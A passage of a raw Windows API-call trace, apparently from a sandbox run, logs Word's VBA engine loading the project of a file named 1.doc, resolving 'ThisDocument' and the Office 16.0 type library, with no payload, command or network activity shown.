CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x33e4fb3be0, cbMultiByte=2043, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.109] lstrlenA (lpString="Normal") returned 6 [0059.109] SysStringByteLen (bstr="潎浲污") returned 0x6 [0059.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543198, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.109] SysStringByteLen (bstr="潎浲污") returned 0x6 [0059.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543198, cbMultiByte=7, lpWideCharStr=0x1d398219698, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0059.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x33e4fb4cb0, cbMultiByte=2043, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.109] lstrlenA (lpString="Normal") returned 6 [0059.111] wcscpy_s (in: _Destination=0x33e4fb4466, _SizeInWords=0x801, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0059.111] _wcsicmp (_String1="*\\CNormal", _String2="*\\Z0261d40718") returned -23 [0059.112] IUnknown:AddRef (This=0x1d3980663b0) returned 0x4 [0059.112] IUnknown:QueryInterface (in: This=0x1d3980663b0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb22b8 | out: ppvObject=0x33e4fb22b8*=0x0) returned 0x80004002 [0059.112] IUnknown:Release (This=0x1d3980663b0) returned 0x3 [0059.112] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x6 [0059.112] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb22b8 | out: ppvObject=0x33e4fb22b8*=0x0) returned 0x80004002 [0059.112] IUnknown:Release (This=0x1d3985c4c00) returned 0x5 [0059.112] IUnknown:AddRef (This=0x1d3980655f0) returned 0x6 [0059.112] IUnknown:QueryInterface (in: This=0x1d3980655f0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb22b8 | out: ppvObject=0x33e4fb22b8*=0x0) returned 0x80004002 [0059.112] IUnknown:Release (This=0x1d3980655f0) returned 0x5 [0059.112] wcsncpy_s (in: _Destination=0x33e4fb1f80, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.112] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb1eb0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.112] _wcsicmp (_String1="*\\Z0261d40718", _String2="*\\Z0261d40718") returned 0 [0059.112] wcsncpy_s (in: _Destination=0x33e4fb1f80, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0059.112] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0059.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb1eb0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0059.112] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0059.114] wcscpy_s (in: _Destination=0x1d39d7de450, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0059.114] wcsncpy_s (in: _Destination=0x33e4fb1f80, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.114] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb1eb0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.115] _wcsicmp (_String1="*\\Z0261d40718", _String2="*\\Z0261d40718") returned 0 [0059.115] wcsncpy_s (in: _Destination=0x33e4fb1fc0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0059.115] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0059.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb1ef0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0059.115] wcscpy_s (in: _Destination=0x1d39d8e4d00, _SizeInWords=0x804, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0059.115] _wfullpath (in: _Buffer=0x33e4fb51e0, _Path="Normal", _BufferCount=0x104 | out: _Buffer="C:\\Users\\FD1HVy\\Documents\\Normal") returned="C:\\Users\\FD1HVy\\Documents\\Normal" [0059.115] SysStringByteLen (bstr="潎浲污") returned 0x6 [0059.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543198, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.115] SysStringByteLen (bstr="潎浲污") returned 0x6 [0059.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398543198, cbMultiByte=7, lpWideCharStr=0x1d398219698, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0059.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x33e4fb4b60, cbMultiByte=2043, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0059.115] lstrlenA (lpString="Normal") returned 6 [0059.116] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb55a8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39bde6b18 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d39bde6b18*="캈翼") returned 0x0 [0059.116] IUnknown:Release (This=0x1d39d552a68) returned 0x0 [0059.116] IsCharAlphaA (ch=84) returned 1 [0059.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb5400, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0059.116] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb53c0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0059.116] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.116] lstrlenA (lpString="ThisDocument") returned 12 [0059.116] malloc (_Size=0x188) returned 0x1d39bdeb690 [0059.117] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552908, ppTypeAttr=0x33e4fb53a0, pDummy=0x0 | out: ppTypeAttr=0x33e4fb53a0, pDummy=0x0) returned 0x0 [0059.117] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552908) returned 0x0 [0059.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb5040, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0059.117] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb5180, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0059.117] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.117] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a7f40, cb=0x8) returned 0x1d39d4a8940 [0059.117] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83d480 [0059.117] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39d83d480) returned 0x80 [0059.117] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39d7fc350 [0059.117] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39d7fb690 [0059.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb5040, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0059.117] CoCreateGuid (in: pguid=0x33e4fb4d70 | out: pguid=0x33e4fb4d70*(Data1=0x66f38c5e, Data2=0xcfae, Data3=0x4019, Data4=([0]=0xb1, [1]=0xed, [2]=0x3e, [3]=0x80, [4]=0x23, [5]=0x8a, [6]=0x10, [7]=0xfd))) returned 0x0 [0059.117] CoCreateGuid (in: pguid=0x33e4fb4d80 | out: pguid=0x33e4fb4d80*(Data1=0x24563a57, Data2=0x8007, Data3=0x4297, Data4=([0]=0x95, [1]=0x3e, [2]=0x9a, [3]=0x9c, [4]=0xad, [5]=0x7, [6]=0x1d, [7]=0x9c))) returned 0x0 [0059.117] WideCharToMultiByte (in: CodePage=0x3b5, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x33e4fb4d90, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0059.117] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.117] GetLocalTime (in: lpSystemTime=0x33e4fb4c68 | out: lpSystemTime=0x33e4fb4c68*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0x193)) [0059.117] _ultow_s (in: _Value=0x61d40718, _Buffer=0x1d39da0e994, _BufferCount=0x9, _Radix=16 | out: _Buffer="61d40718") returned 0x0 [0059.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0361d40718", cchWideChar=11, lpMultiByteStr=0x33e4fb4c00, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0361d40718", lpUsedDefaultChar=0x0) returned 11 [0059.117] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x170) returned 0x1d39d8e3920 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x50) returned 0x1d39d76acc0 [0059.118] strcpy_s (in: _Dst=0x1d39d8b1dd8, _DstSize=0xd, _Src="ThisDocument" | out: _Dst="ThisDocument") returned 0x0 [0059.118] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a7c80, cb=0x68) returned 0x1d39d84dd90 [0059.118] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.118] wcscpy_s (in: _Destination=0x1d39da0e9a8, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0059.118] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.118] wcscpy_s (in: _Destination=0x1d39da0e9c8, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0059.118] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a7ef0, cb=0x12) returned 0x1d39d870420 [0059.118] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a7990, cb=0x6) returned 0x1d39d4a7ef0 [0059.118] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ThisDocument") returned 0x509e3c [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x30) returned 0x1d39d44ca60 [0059.118] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d76a000) [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982157c0 [0059.118] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d3982157c0, cb=0x5c) returned 0x1d39d84ec00 [0059.118] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44ca60) [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x3d0) returned 0x1d39d97f940 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982154c0 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10) returned 0x1d39d86ff80 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83be00 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a7c80 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a7990 [0059.118] wcsncpy_s (in: _Destination=0x33e4fb4ac0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0059.118] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0059.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb49f0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0059.118] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x688) returned 0x1d39da44190 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83df30 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x640) returned 0x1d39d8e74b0 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398215310 [0059.118] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a7f40 [0059.119] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a8950 [0059.119] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982151f0 [0059.119] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d83cf70 [0059.119] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_Evaluate") returned 0x50d918 [0059.119] strcpy_s (in: _Dst=0x33e4fb4c90, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0059.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4c90, cbMultiByte=10, lpWideCharStr=0x33e4fb4ae0, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0059.119] IUnknown:AddRef (This=0x1d3980663b0) returned 0x4 [0059.119] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="_Evaluate", lHashVal=0x50d918, pfName=0x33e4fb4bb0, pBstrLibName=0x33e4fb4ae0 | out: pfName=0x33e4fb4bb0*=0, pBstrLibName=0x33e4fb4ae0) returned 0x0 [0059.119] IUnknown:Release (This=0x1d3980663b0) returned 0x3 [0059.119] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x7 [0059.119] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="_Evaluate", lHashVal=0x50d918, pfName=0x33e4fb4bb0, pBstrLibName=0x33e4fb4ae0 | out: pfName=0x33e4fb4bb0*=0, pBstrLibName=0x33e4fb4ae0) returned 0x0 [0059.119] IUnknown:Release (This=0x1d3985c4c00) returned 0x6 [0059.119] IUnknown:AddRef (This=0x1d3980655f0) returned 0x6 [0059.119] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="_Evaluate", lHashVal=0x50d918, pfName=0x33e4fb4bb0, pBstrLibName=0x33e4fb4ae0 | out: pfName=0x33e4fb4bb0*=0, pBstrLibName=0x33e4fb4ae0) returned 0x0 [0059.119] IUnknown:Release (This=0x1d3980655f0) returned 0x5 [0059.120] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982156d0 [0059.120] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d3982157c0 [0059.121] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a7c80, cb=0x20) returned 0x1d398215190 [0059.121] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a7f40, cb=0x28) returned 0x1d398215280 [0059.121] wcsncpy_s (in: _Destination=0x33e4fb4d00, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0059.121] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0059.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb4c30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0059.121] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0059.121] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0059.121] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x420) returned 0x1d39da0eca0 [0059.121] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39da0eca0) [0059.124] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x33e4fb5668*=0x0 | out: pptlib=0x33e4fb5668*=0x1d3985c5700) returned 0x0 [0059.124] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x33e4fb44f8*=0x0 | out: pptlib=0x33e4fb44f8*=0x1d3985c5700) returned 0x0 [0059.124] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c5700, index=-1, refPtrFlags=0xe4fb4518, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d38cf3ba10 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1d38cf3ba10*="ꢠ翼") returned 0x0 [0059.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x33e4fb4400, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0059.124] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Office") returned 0x507515 [0059.124] IUnknown:QueryInterface (in: This=0x1d3985c5700, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb43d8 | out: ppvObject=0x33e4fb43d8*=0x0) returned 0x80004002 [0059.124] GetLocalTime (in: lpSystemTime=0x33e4fb4280 | out: lpSystemTime=0x33e4fb4280*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0x1a3)) [0059.124] wcsncpy_s (in: _Destination=0x33e4fb3f30, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0059.124] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0059.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb3e60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0059.124] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0059.124] GetLocalTime (in: lpSystemTime=0x33e4fb4120 | out: lpSystemTime=0x33e4fb4120*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0x1a3)) [0059.124] wcsncpy_s (in: _Destination=0x33e4fb3dd0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0059.124] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", cchLength=0x20 | out: lpsz="*\\cc:\\users\\fd1hvy\\desktop\\1.doc") returned 0x20 [0059.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", cchWideChar=33, lpMultiByteStr=0x33e4fb3d00, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", lpUsedDefaultChar=0x0) returned 33 [0059.124] _wcsicmp (_String1="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _String2="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0 [0059.125] IUnknown:QueryInterface (in: This=0x1d3985c5700, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4308 | out: ppvObject=0x33e4fb4308*=0x0) returned 0x80004002 [0059.125] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c5700, ppTLibAttr=0x33e4fb4300, pDummy=0x33e4fb4308 | out: ppTLibAttr=0x33e4fb4300, pDummy=0x33e4fb4308*=0x0) returned 0x0 [0059.125] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c5700, index=-1, refPtrFlags=0x0, pBstrName=0x33e4fb42f8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000 | out: pBstrName=0x33e4fb42f8*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x100000000) returned 0x0 [0059.125] StringFromGUID2 (in: rguid=0x1d398543190*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x33e4fb4320, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0059.125] _ultow_s (in: _Value=0x2, _Buffer=0x33e4fb426a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0059.125] _ultow_s (in: _Value=0x8, _Buffer=0x33e4fb426e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0059.125] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb4272, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0059.125] wcscpy_s (in: _Destination=0x1d39d9ec5d8, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0059.125] wcscpy_s (in: _Destination=0x1d39d9ec5de, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0059.125] wcscpy_s (in: _Destination=0x1d39d9ec62a, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0059.125] wcscpy_s (in: _Destination=0x1d39d9ec638, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0059.125] wcscpy_s (in: _Destination=0x1d39d9ec6b8, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0059.125] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c5700) returned 0x0 [0059.125] wcscpy_s (in: _Destination=0x1d39da0e9e8, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0059.125] ITypeLib:RemoteGetDocumentation (in: This=0x1d3985c5700, index=-1, refPtrFlags=0xe4fb4418, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0059.125] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Office") returned 0x507515 [0059.125] strcpy_s (in: _Dst=0x33e4fb4210, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0059.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4210, cbMultiByte=7, lpWideCharStr=0x33e4fb4060, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0059.125] IUnknown:AddRef (This=0x1d3980663b0) returned 0x4 [0059.125] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="Office", lHashVal=0x507515, pfName=0x33e4fb4130, pBstrLibName=0x33e4fb4060 | out: pfName=0x33e4fb4130*=0, pBstrLibName=0x33e4fb4060) returned 0x0 [0059.125] IUnknown:Release (This=0x1d3980663b0) returned 0x3 [0059.125] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x9 [0059.125] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="Office", lHashVal=0x507515, pfName=0x33e4fb4130, pBstrLibName=0x33e4fb4060 | out: pfName=0x33e4fb4130*=0, pBstrLibName=0x33e4fb4060) returned 0x0 [0059.125] IUnknown:Release (This=0x1d3985c4c00) returned 0x8 [0059.125] IUnknown:AddRef (This=0x1d3980655f0) returned 0x6 [0059.125] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="Office", lHashVal=0x507515, pfName=0x33e4fb4130, pBstrLibName=0x33e4fb4060 | out: pfName=0x33e4fb4130*=0, pBstrLibName=0x33e4fb4060) returned 0x0 [0059.125] IUnknown:Release (This=0x1d3980655f0) returned 0x5 [0059.125] 